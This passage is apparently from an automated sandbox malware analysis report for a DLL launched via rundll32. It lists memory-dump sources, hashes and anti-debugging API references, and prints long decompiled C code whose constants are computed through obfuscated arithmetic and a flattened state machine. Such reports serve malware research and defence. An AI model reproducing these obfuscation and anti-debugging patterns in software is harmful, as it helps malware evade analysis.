                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 5th8$6$$L>+$Mw$Mw$fRb
                                                                                                                                    • API String ID: 0-3812525031
                                                                                                                                    • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                    • Instruction ID: 09ec270b35e3a031e3c3776565f344ea6bd52888314eefe2efd71f354329d8a2
                                                                                                                                    • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                    • Instruction Fuzzy Hash: 869175B21183429BC794CE60C88A91BFBF5FBD4758F104A1DF59292220D7B1CA29CF83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                    • Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                                    • Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
                                                                                                                                    • Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                                    • Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E002E0056() {
                                                                                                                                    				char _v520;
                                                                                                                                    				char _v1040;
                                                                                                                                    				char _v1560;
                                                                                                                                    				char _v1564;
                                                                                                                                    				signed int _v1568;
                                                                                                                                    				signed int _v1572;
                                                                                                                                    				signed int _v1576;
                                                                                                                                    				signed int _v1580;
                                                                                                                                    				signed int _v1584;
                                                                                                                                    				signed int _v1588;
                                                                                                                                    				signed int _v1592;
                                                                                                                                    				signed int _v1596;
                                                                                                                                    				signed int _v1600;
                                                                                                                                    				signed int _v1604;
                                                                                                                                    				signed int _v1608;
                                                                                                                                    				signed int _v1612;
                                                                                                                                    				signed int _v1616;
                                                                                                                                    				signed int _v1620;
                                                                                                                                    				signed int _v1624;
                                                                                                                                    				signed int _v1628;
                                                                                                                                    				signed int _v1632;
                                                                                                                                    				signed int _v1636;
                                                                                                                                    				signed int _v1640;
                                                                                                                                    				signed int _v1644;
                                                                                                                                    				signed int _v1648;
                                                                                                                                    				signed int _v1652;
                                                                                                                                    				unsigned int _v1656;
                                                                                                                                    				signed int _v1660;
                                                                                                                                    				signed int _v1664;
                                                                                                                                    				signed int _v1668;
                                                                                                                                    				signed int _v1672;
                                                                                                                                    				signed int _v1676;
                                                                                                                                    				signed int _v1680;
                                                                                                                                    				signed int _v1684;
                                                                                                                                    				signed int _v1688;
                                                                                                                                    				signed int _v1692;
                                                                                                                                    				signed int _v1696;
                                                                                                                                    				signed int _v1700;
                                                                                                                                    				signed int _v1704;
                                                                                                                                    				signed int _v1708;
                                                                                                                                    				signed int _v1712;
                                                                                                                                    				signed int _v1716;
                                                                                                                                    				signed int _v1720;
                                                                                                                                    				signed int _v1724;
                                                                                                                                    				signed int _v1728;
                                                                                                                                    				signed int _v1732;
                                                                                                                                    				signed int _v1736;
                                                                                                                                    				signed int _v1740;
                                                                                                                                    				signed int _v1744;
                                                                                                                                    				signed int _v1748;
                                                                                                                                    				void* _t500;
                                                                                                                                    				void* _t502;
                                                                                                                                    				intOrPtr* _t509;
                                                                                                                                    				void* _t513;
                                                                                                                                    				signed int _t522;
                                                                                                                                    				intOrPtr _t523;
                                                                                                                                    				intOrPtr* _t524;
                                                                                                                                    				signed int _t525;
                                                                                                                                    				signed int _t526;
                                                                                                                                    				signed int _t527;
                                                                                                                                    				signed int _t528;
                                                                                                                                    				signed int _t529;
                                                                                                                                    				signed int _t530;
                                                                                                                                    				signed int _t531;
                                                                                                                                    				signed int _t532;
                                                                                                                                    				signed int _t533;
                                                                                                                                    				signed int _t534;
                                                                                                                                    				signed int _t535;
                                                                                                                                    				signed int _t536;
                                                                                                                                    				signed int _t537;
                                                                                                                                    				signed int _t538;
                                                                                                                                    				signed int _t539;
                                                                                                                                    				void* _t540;
                                                                                                                                    				void* _t546;
                                                                                                                                    				intOrPtr _t556;
                                                                                                                                    				void* _t603;
                                                                                                                                    				signed int _t605;
                                                                                                                                    				signed int* _t609;
                                                                                                                                    
                                                                                                                                    				_t609 =  &_v1748;
                                                                                                                                    				_v1648 = 0xded5e0;
                                                                                                                                    				_v1648 = _v1648 >> 0xb;
                                                                                                                                    				_v1648 = _v1648 | 0x3a1a97de;
                                                                                                                                    				_v1648 = _v1648 ^ 0x3a1a9ff7;
                                                                                                                                    				_v1608 = 0x6694ca;
                                                                                                                                    				_v1608 = _v1608 | 0xdc2b4f48;
                                                                                                                                    				_v1608 = _v1608 ^ 0x5c6fdfcb;
                                                                                                                                    				_v1712 = 0x53f825;
                                                                                                                                    				_v1712 = _v1712 >> 2;
                                                                                                                                    				_v1712 = _v1712 ^ 0x4e440c95;
                                                                                                                                    				_v1712 = _v1712 | 0x7235b0e7;
                                                                                                                                    				_v1712 = _v1712 ^ 0x7e75f2fd;
                                                                                                                                    				_v1632 = 0xc6d169;
                                                                                                                                    				_v1568 = 0;
                                                                                                                                    				_t603 = 0x9805d0a;
                                                                                                                                    				_t525 = 0x52;
                                                                                                                                    				_v1632 = _v1632 / _t525;
                                                                                                                                    				_t526 = 0x67;
                                                                                                                                    				_v1632 = _v1632 * 0x1e;
                                                                                                                                    				_v1632 = _v1632 ^ 0x0048bcfb;
                                                                                                                                    				_v1596 = 0x189afb;
                                                                                                                                    				_v1596 = _v1596 >> 0xe;
                                                                                                                                    				_v1596 = _v1596 ^ 0x000d7c1d;
                                                                                                                                    				_v1724 = 0x4bfed1;
                                                                                                                                    				_v1724 = _v1724 * 0x63;
                                                                                                                                    				_v1724 = _v1724 * 0x55;
                                                                                                                                    				_v1724 = _v1724 >> 1;
                                                                                                                                    				_v1724 = _v1724 ^ 0x61069d5d;
                                                                                                                                    				_v1580 = 0x401b2b;
                                                                                                                                    				_v1580 = _v1580 + 0x7090;
                                                                                                                                    				_v1580 = _v1580 ^ 0x00412b45;
                                                                                                                                    				_v1672 = 0xbaa782;
                                                                                                                                    				_v1672 = _v1672 / _t526;
                                                                                                                                    				_v1672 = _v1672 << 2;
                                                                                                                                    				_v1672 = _v1672 ^ 0x000e5528;
                                                                                                                                    				_v1624 = 0x1efbce;
                                                                                                                                    				_t527 = 0x4f;
                                                                                                                                    				_v1624 = _v1624 / _t527;
                                                                                                                                    				_v1624 = _v1624 ^ 0x000dc160;
                                                                                                                                    				_v1572 = 0x9ef416;
                                                                                                                                    				_t605 = 0x62;
                                                                                                                                    				_v1572 = _v1572 / _t605;
                                                                                                                                    				_v1572 = _v1572 ^ 0x00079814;
                                                                                                                                    				_v1612 = 0x4efe15;
                                                                                                                                    				_t528 = 0x43;
                                                                                                                                    				_v1612 = _v1612 / _t528;
                                                                                                                                    				_v1612 = _v1612 ^ 0x000e5446;
                                                                                                                                    				_v1640 = 0x94326d;
                                                                                                                                    				_t529 = 0x77;
                                                                                                                                    				_v1640 = _v1640 / _t529;
                                                                                                                                    				_t530 = 0x35;
                                                                                                                                    				_v1640 = _v1640 / _t530;
                                                                                                                                    				_v1640 = _v1640 ^ 0x000d83b8;
                                                                                                                                    				_v1676 = 0x511d41;
                                                                                                                                    				_t531 = 9;
                                                                                                                                    				_v1676 = _v1676 * 0x76;
                                                                                                                                    				_v1676 = _v1676 ^ 0xeef8e480;
                                                                                                                                    				_v1676 = _v1676 ^ 0xcb952f57;
                                                                                                                                    				_v1708 = 0x4e0a18;
                                                                                                                                    				_v1708 = _v1708 ^ 0x2110c6ad;
                                                                                                                                    				_v1708 = _v1708 | 0x4a7f48ac;
                                                                                                                                    				_v1708 = _v1708 + 0xffff2cb4;
                                                                                                                                    				_v1708 = _v1708 ^ 0x6b758b76;
                                                                                                                                    				_v1732 = 0x7a6741;
                                                                                                                                    				_t123 =  &_v1732; // 0x7a6741
                                                                                                                                    				_v1732 =  *_t123 / _t531;
                                                                                                                                    				_v1732 = _v1732 << 0xe;
                                                                                                                                    				_v1732 = _v1732 << 7;
                                                                                                                                    				_v1732 = _v1732 ^ 0x36245548;
                                                                                                                                    				_v1700 = 0x42788;
                                                                                                                                    				_t532 = 0x44;
                                                                                                                                    				_v1700 = _v1700 / _t532;
                                                                                                                                    				_v1700 = _v1700 | 0xce808109;
                                                                                                                                    				_v1700 = _v1700 + 0xffff7a0f;
                                                                                                                                    				_v1700 = _v1700 ^ 0xce88d2ed;
                                                                                                                                    				_v1740 = 0x39c25c;
                                                                                                                                    				_v1740 = _v1740 + 0xf71;
                                                                                                                                    				_t533 = 0x75;
                                                                                                                                    				_v1740 = _v1740 / _t533;
                                                                                                                                    				_v1740 = _v1740 ^ 0xc60840fd;
                                                                                                                                    				_v1740 = _v1740 ^ 0xc60d36f5;
                                                                                                                                    				_v1716 = 0x2bcc6c;
                                                                                                                                    				_v1716 = _v1716 + 0x97be;
                                                                                                                                    				_v1716 = _v1716 >> 0xd;
                                                                                                                                    				_v1716 = _v1716 ^ 0xcb020dbc;
                                                                                                                                    				_v1716 = _v1716 ^ 0xcb05808e;
                                                                                                                                    				_v1604 = 0x3f7ac0;
                                                                                                                                    				_v1604 = _v1604 + 0xafc6;
                                                                                                                                    				_v1604 = _v1604 ^ 0x0048c4ef;
                                                                                                                                    				_v1576 = 0x9f011d;
                                                                                                                                    				_v1576 = _v1576 ^ 0x8bb25c52;
                                                                                                                                    				_v1576 = _v1576 ^ 0x8b2a60ae;
                                                                                                                                    				_v1684 = 0xe4045e;
                                                                                                                                    				_v1684 = _v1684 * 0x42;
                                                                                                                                    				_v1684 = _v1684 * 0xc;
                                                                                                                                    				_v1684 = _v1684 ^ 0xc16ccb70;
                                                                                                                                    				_v1720 = 0x76be5;
                                                                                                                                    				_v1720 = _v1720 >> 0xd;
                                                                                                                                    				_v1720 = _v1720 * 0x3b;
                                                                                                                                    				_v1720 = _v1720 + 0xffffaa4e;
                                                                                                                                    				_v1720 = _v1720 ^ 0xfff1ea6d;
                                                                                                                                    				_v1680 = 0x1fb4c3;
                                                                                                                                    				_v1680 = _v1680 << 4;
                                                                                                                                    				_v1680 = _v1680 << 0xc;
                                                                                                                                    				_v1680 = _v1680 ^ 0xb4c6c556;
                                                                                                                                    				_v1644 = 0xb0dbcd;
                                                                                                                                    				_v1644 = _v1644 << 0xf;
                                                                                                                                    				_v1644 = _v1644 << 0x10;
                                                                                                                                    				_v1644 = _v1644 ^ 0x800a09c5;
                                                                                                                                    				_v1600 = 0x1a67e8;
                                                                                                                                    				_v1600 = _v1600 | 0xeb4b5744;
                                                                                                                                    				_v1600 = _v1600 ^ 0xeb54c7c0;
                                                                                                                                    				_v1652 = 0x1784b1;
                                                                                                                                    				_v1652 = _v1652 >> 0xf;
                                                                                                                                    				_v1652 = _v1652 << 6;
                                                                                                                                    				_v1652 = _v1652 ^ 0x00082079;
                                                                                                                                    				_v1660 = 0xec7770;
                                                                                                                                    				_v1660 = _v1660 + 0xb190;
                                                                                                                                    				_v1660 = _v1660 | 0x400c0cca;
                                                                                                                                    				_v1660 = _v1660 ^ 0x40ee2104;
                                                                                                                                    				_v1668 = 0xfc9259;
                                                                                                                                    				_v1668 = _v1668 + 0xffffc6b7;
                                                                                                                                    				_v1668 = _v1668 >> 0xe;
                                                                                                                                    				_v1668 = _v1668 ^ 0x000f272a;
                                                                                                                                    				_v1704 = 0xff7fae;
                                                                                                                                    				_v1704 = _v1704 + 0xffff711f;
                                                                                                                                    				_v1704 = _v1704 + 0xffff4b94;
                                                                                                                                    				_v1704 = _v1704 | 0x5a3393fe;
                                                                                                                                    				_v1704 = _v1704 ^ 0x5af53198;
                                                                                                                                    				_v1616 = 0x130067;
                                                                                                                                    				_t534 = 0x4e;
                                                                                                                                    				_v1616 = _v1616 / _t534;
                                                                                                                                    				_v1616 = _v1616 ^ 0x00057283;
                                                                                                                                    				_v1628 = 0x10552;
                                                                                                                                    				_v1628 = _v1628 + 0xf3cd;
                                                                                                                                    				_v1628 = _v1628 + 0x9e6e;
                                                                                                                                    				_v1628 = _v1628 ^ 0x00033ec8;
                                                                                                                                    				_v1636 = 0x95cc92;
                                                                                                                                    				_v1636 = _v1636 >> 0xf;
                                                                                                                                    				_v1636 = _v1636 + 0x9761;
                                                                                                                                    				_v1636 = _v1636 ^ 0x000e6713;
                                                                                                                                    				_v1748 = 0xd7b406;
                                                                                                                                    				_t535 = 0x31;
                                                                                                                                    				_v1748 = _v1748 * 0x46;
                                                                                                                                    				_v1748 = _v1748 << 1;
                                                                                                                                    				_v1748 = _v1748 + 0x479a;
                                                                                                                                    				_v1748 = _v1748 ^ 0x75ff50ef;
                                                                                                                                    				_v1584 = 0xe29275;
                                                                                                                                    				_v1584 = _v1584 * 0x6d;
                                                                                                                                    				_v1584 = _v1584 ^ 0x607f0d3c;
                                                                                                                                    				_v1664 = 0xc2b99a;
                                                                                                                                    				_v1664 = _v1664 / _t605;
                                                                                                                                    				_v1664 = _v1664 | 0xc7d1021c;
                                                                                                                                    				_v1664 = _v1664 ^ 0xc7dc1815;
                                                                                                                                    				_v1692 = 0xa5d2da;
                                                                                                                                    				_v1692 = _v1692 * 0x17;
                                                                                                                                    				_v1692 = _v1692 / _t535;
                                                                                                                                    				_t536 = 0x23;
                                                                                                                                    				_v1692 = _v1692 * 0x3a;
                                                                                                                                    				_v1692 = _v1692 ^ 0x11a891cb;
                                                                                                                                    				_v1656 = 0x680db3;
                                                                                                                                    				_v1656 = _v1656 >> 6;
                                                                                                                                    				_v1656 = _v1656 >> 5;
                                                                                                                                    				_v1656 = _v1656 ^ 0x000507e8;
                                                                                                                                    				_v1728 = 0x12970f;
                                                                                                                                    				_v1728 = _v1728 + 0xffffbe66;
                                                                                                                                    				_v1728 = _v1728 >> 6;
                                                                                                                                    				_v1728 = _v1728 / _t536;
                                                                                                                                    				_v1728 = _v1728 ^ 0x00053169;
                                                                                                                                    				_v1620 = 0xa87d1b;
                                                                                                                                    				_v1620 = _v1620 + 0xc3ba;
                                                                                                                                    				_v1620 = _v1620 ^ 0x00a7b1ac;
                                                                                                                                    				_v1736 = 0xb206b7;
                                                                                                                                    				_v1736 = _v1736 ^ 0x6f4eb888;
                                                                                                                                    				_t537 = 0x5d;
                                                                                                                                    				_v1736 = _v1736 / _t537;
                                                                                                                                    				_v1736 = _v1736 + 0x173b;
                                                                                                                                    				_v1736 = _v1736 ^ 0x013191a0;
                                                                                                                                    				_v1744 = 0xbf67a7;
                                                                                                                                    				_t538 = 0x70;
                                                                                                                                    				_v1744 = _v1744 / _t538;
                                                                                                                                    				_v1744 = _v1744 | 0x1279871b;
                                                                                                                                    				_v1744 = _v1744 ^ 0x04c3b9b8;
                                                                                                                                    				_v1744 = _v1744 ^ 0x16b0fef0;
                                                                                                                                    				_v1588 = 0x7bc48a;
                                                                                                                                    				_v1588 = _v1588 << 7;
                                                                                                                                    				_v1588 = _v1588 ^ 0x3de90636;
                                                                                                                                    				_v1688 = 0x5dc5eb;
                                                                                                                                    				_v1688 = _v1688 >> 0xb;
                                                                                                                                    				_v1688 = _v1688 + 0xaf87;
                                                                                                                                    				_t539 = 0x6c;
                                                                                                                                    				_t522 = _v1568;
                                                                                                                                    				_v1688 = _v1688 * 0x63;
                                                                                                                                    				_v1688 = _v1688 ^ 0x004fac27;
                                                                                                                                    				_v1696 = 0x311285;
                                                                                                                                    				_v1696 = _v1696 << 0xb;
                                                                                                                                    				_v1696 = _v1696 ^ 0x3061b352;
                                                                                                                                    				_v1696 = _v1696 / _t539;
                                                                                                                                    				_v1696 = _v1696 ^ 0x01b73771;
                                                                                                                                    				_v1592 = 0x977507;
                                                                                                                                    				_v1592 = _v1592 | 0xf9843f0d;
                                                                                                                                    				_v1592 = _v1592 ^ 0xf99a58c3;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t540 = 0x5c;
                                                                                                                                    					while(1) {
                                                                                                                                    						L2:
                                                                                                                                    						_t500 = 0x8167d85;
                                                                                                                                    						do {
                                                                                                                                    							L3:
                                                                                                                                    							if(_t603 == 0x2c7b186) {
                                                                                                                                    								E002C1FD1(_v1688, _v1696, _v1592, _v1564);
                                                                                                                                    								_t603 = 0xcf98960;
                                                                                                                                    								goto L18;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t603 == 0x33b45b1) {
                                                                                                                                    									_push(_v1680);
                                                                                                                                    									_push(_v1720);
                                                                                                                                    									_t502 = E002DDCF7(_v1684, 0x2c1080, __eflags);
                                                                                                                                    									_pop(_t546);
                                                                                                                                    									__eflags = E002CAAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
                                                                                                                                    									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
                                                                                                                                    									E002CA8B0(_v1628, _t502, _v1636);
                                                                                                                                    									_t609 =  &(_t609[0xf]);
                                                                                                                                    									L18:
                                                                                                                                    									_t500 = 0x8167d85;
                                                                                                                                    									_t540 = 0x5c;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t603 == _t500) {
                                                                                                                                    										_t509 = E002CF002(2 + E002CCB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E002CCB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
                                                                                                                                    										_t609 =  &(_t609[0xd]);
                                                                                                                                    										__eflags = _t509;
                                                                                                                                    										_t603 = 0x2c7b186;
                                                                                                                                    										_v1568 = 0 | __eflags == 0x00000000;
                                                                                                                                    										goto L1;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t603 == 0x9805d0a) {
                                                                                                                                    											_push(_v1672);
                                                                                                                                    											_push(_v1648);
                                                                                                                                    											_push(_v1580);
                                                                                                                                    											_push( &_v520);
                                                                                                                                    											E002D46BB(_v1596, _v1724);
                                                                                                                                    											_t609 = _t609 - 0xc + 0x1c;
                                                                                                                                    											_t603 = 0xc81d40c;
                                                                                                                                    											while(1) {
                                                                                                                                    												L1:
                                                                                                                                    												_t540 = 0x5c;
                                                                                                                                    												goto L2;
                                                                                                                                    											}
                                                                                                                                    										} else {
                                                                                                                                    											if(_t603 == 0xaea35f7) {
                                                                                                                                    												_t523 =  *0x2e3e10; // 0x0
                                                                                                                                    												_t524 = _t523 + 0x1c;
                                                                                                                                    												while(1) {
                                                                                                                                    													__eflags =  *_t524 - _t540;
                                                                                                                                    													if(__eflags == 0) {
                                                                                                                                    														break;
                                                                                                                                    													}
                                                                                                                                    													_t524 = _t524 + 2;
                                                                                                                                    													__eflags = _t524;
                                                                                                                                    												}
                                                                                                                                    												_t522 = _t524 + 2;
                                                                                                                                    												_t603 = 0x33b45b1;
                                                                                                                                    												goto L2;
                                                                                                                                    											} else {
                                                                                                                                    												_t618 = _t603 - 0xc81d40c;
                                                                                                                                    												if(_t603 == 0xc81d40c) {
                                                                                                                                    													_push(_v1612);
                                                                                                                                    													_push(_v1572);
                                                                                                                                    													_t513 = E002DDCF7(_v1624, 0x2c1020, _t618);
                                                                                                                                    													E002D176B( &_v1040, _t618);
                                                                                                                                    													_t556 =  *0x2e3e10; // 0x0
                                                                                                                                    													_t403 = _t556 + 0x1c; // 0x1c
                                                                                                                                    													_t404 = _t556 + 0x23c; // 0x23c
                                                                                                                                    													E002D1652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
                                                                                                                                    													E002CA8B0(_v1604, _t513, _v1576);
                                                                                                                                    													_t609 =  &(_t609[0xf]);
                                                                                                                                    													_t603 = 0xaea35f7;
                                                                                                                                    													while(1) {
                                                                                                                                    														L1:
                                                                                                                                    														_t540 = 0x5c;
                                                                                                                                    														L2:
                                                                                                                                    														_t500 = 0x8167d85;
                                                                                                                                    														goto L3;
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							__eflags = _t603 - 0xcf98960;
                                                                                                                                    						} while (__eflags != 0);
                                                                                                                                    						return _v1568;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}
                                                                                                                                    0x002e044c
                                                                                                                                    0x002e0454
                                                                                                                                    0x002e045c
                                                                                                                                    0x002e0464
                                                                                                                                    0x002e046c
                                                                                                                                    0x002e0471
                                                                                                                                    0x002e0479
                                                                                                                                    0x002e0481
                                                                                                                                    0x002e0489
                                                                                                                                    0x002e0491
                                                                                                                                    0x002e0499
                                                                                                                                    0x002e04a1
                                                                                                                                    0x002e04b5
                                                                                                                                    0x002e04ba
                                                                                                                                    0x002e04c1
                                                                                                                                    0x002e04cc
                                                                                                                                    0x002e04d7
                                                                                                                                    0x002e04e2
                                                                                                                                    0x002e04ed
                                                                                                                                    0x002e04f8
                                                                                                                                    0x002e0503
                                                                                                                                    0x002e050b
                                                                                                                                    0x002e0516
                                                                                                                                    0x002e0521
                                                                                                                                    0x002e0530
                                                                                                                                    0x002e0533
                                                                                                                                    0x002e0537
                                                                                                                                    0x002e053b
                                                                                                                                    0x002e0543
                                                                                                                                    0x002e054b
                                                                                                                                    0x002e055e
                                                                                                                                    0x002e0565
                                                                                                                                    0x002e0570
                                                                                                                                    0x002e0580
                                                                                                                                    0x002e0584
                                                                                                                                    0x002e058c
                                                                                                                                    0x002e0594
                                                                                                                                    0x002e05a1
                                                                                                                                    0x002e05ad
                                                                                                                                    0x002e05b6
                                                                                                                                    0x002e05b7
                                                                                                                                    0x002e05bb
                                                                                                                                    0x002e05c3
                                                                                                                                    0x002e05cb
                                                                                                                                    0x002e05d0
                                                                                                                                    0x002e05d5
                                                                                                                                    0x002e05dd
                                                                                                                                    0x002e05e5
                                                                                                                                    0x002e05ed
                                                                                                                                    0x002e05f8
                                                                                                                                    0x002e05fc
                                                                                                                                    0x002e0604
                                                                                                                                    0x002e060f
                                                                                                                                    0x002e061a
                                                                                                                                    0x002e0625
                                                                                                                                    0x002e062d
                                                                                                                                    0x002e0642
                                                                                                                                    0x002e0647
                                                                                                                                    0x002e064d
                                                                                                                                    0x002e0655
                                                                                                                                    0x002e065d
                                                                                                                                    0x002e0669
                                                                                                                                    0x002e066e
                                                                                                                                    0x002e0674
                                                                                                                                    0x002e067c
                                                                                                                                    0x002e0684
                                                                                                                                    0x002e068c
                                                                                                                                    0x002e0697
                                                                                                                                    0x002e069f
                                                                                                                                    0x002e06aa
                                                                                                                                    0x002e06b2
                                                                                                                                    0x002e06b7
                                                                                                                                    0x002e06c4
                                                                                                                                    0x002e06c5
                                                                                                                                    0x002e06cc
                                                                                                                                    0x002e06d0
                                                                                                                                    0x002e06d8
                                                                                                                                    0x002e06e0
                                                                                                                                    0x002e06e5
                                                                                                                                    0x002e06f3
                                                                                                                                    0x002e06f7
                                                                                                                                    0x002e06ff
                                                                                                                                    0x002e070a
                                                                                                                                    0x002e0715
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0722
                                                                                                                                    0x002e0723
                                                                                                                                    0x002e0723
                                                                                                                                    0x002e0723
                                                                                                                                    0x002e0728
                                                                                                                                    0x002e0728
                                                                                                                                    0x002e072e
                                                                                                                                    0x002e098a
                                                                                                                                    0x002e0991
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0734
                                                                                                                                    0x002e073a
                                                                                                                                    0x002e08ea
                                                                                                                                    0x002e08f3
                                                                                                                                    0x002e08fb
                                                                                                                                    0x002e0901
                                                                                                                                    0x002e095c
                                                                                                                                    0x002e0967
                                                                                                                                    0x002e096a
                                                                                                                                    0x002e096f
                                                                                                                                    0x002e0993
                                                                                                                                    0x002e0995
                                                                                                                                    0x002e099a
                                                                                                                                    0x002e0740
                                                                                                                                    0x002e0742
                                                                                                                                    0x002e08ca
                                                                                                                                    0x002e08d1
                                                                                                                                    0x002e08d4
                                                                                                                                    0x002e08d6
                                                                                                                                    0x002e08de
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0748
                                                                                                                                    0x002e074e
                                                                                                                                    0x002e0831
                                                                                                                                    0x002e083c
                                                                                                                                    0x002e0840
                                                                                                                                    0x002e0855
                                                                                                                                    0x002e0856
                                                                                                                                    0x002e085b
                                                                                                                                    0x002e085e
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0722
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0722
                                                                                                                                    0x002e0754
                                                                                                                                    0x002e075a
                                                                                                                                    0x002e0811
                                                                                                                                    0x002e0817
                                                                                                                                    0x002e081f
                                                                                                                                    0x002e081f
                                                                                                                                    0x002e0822
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002e081c
                                                                                                                                    0x002e081c
                                                                                                                                    0x002e081c
                                                                                                                                    0x002e0824
                                                                                                                                    0x002e0827
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0760
                                                                                                                                    0x002e0760
                                                                                                                                    0x002e0766
                                                                                                                                    0x002e076c
                                                                                                                                    0x002e0778
                                                                                                                                    0x002e0786
                                                                                                                                    0x002e0794
                                                                                                                                    0x002e07cb
                                                                                                                                    0x002e07d8
                                                                                                                                    0x002e07dc
                                                                                                                                    0x002e07ea
                                                                                                                                    0x002e07ff
                                                                                                                                    0x002e0804
                                                                                                                                    0x002e0807
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0722
                                                                                                                                    0x002e0723
                                                                                                                                    0x002e0723
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0723
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0766
                                                                                                                                    0x002e075a
                                                                                                                                    0x002e074e
                                                                                                                                    0x002e0742
                                                                                                                                    0x002e073a
                                                                                                                                    0x002e099b
                                                                                                                                    0x002e099b
                                                                                                                                    0x002e09b4
                                                                                                                                    0x002e09b4
                                                                                                                                    0x002e0723

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Agz$DWK$E+A$g$pw
                                                                                                                                    • API String ID: 0-1474679353
                                                                                                                                    • Opcode ID: 2972285c16c98cc5a80d452e260eb3818686606a609137ff36bdba6dc306e2d0
                                                                                                                                    • Instruction ID: 489c902d2833360865728222d1e7648fdbee45dc8b894e49cbdd58bb98b245c1
                                                                                                                                    • Opcode Fuzzy Hash: 2972285c16c98cc5a80d452e260eb3818686606a609137ff36bdba6dc306e2d0
                                                                                                                                    • Instruction Fuzzy Hash: 3A32227150C3808FD368CF26C98AA8BFBF2BBC5748F10891DE19986261D7B59959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002CF09B(void* __ecx) {
                                                                                                                                    				char _v520;
                                                                                                                                    				char _v1040;
                                                                                                                                    				char _v1560;
                                                                                                                                    				char _v2080;
                                                                                                                                    				char _v2600;
                                                                                                                                    				signed int _v2604;
                                                                                                                                    				signed int _v2608;
                                                                                                                                    				signed int _v2612;
                                                                                                                                    				signed int _v2616;
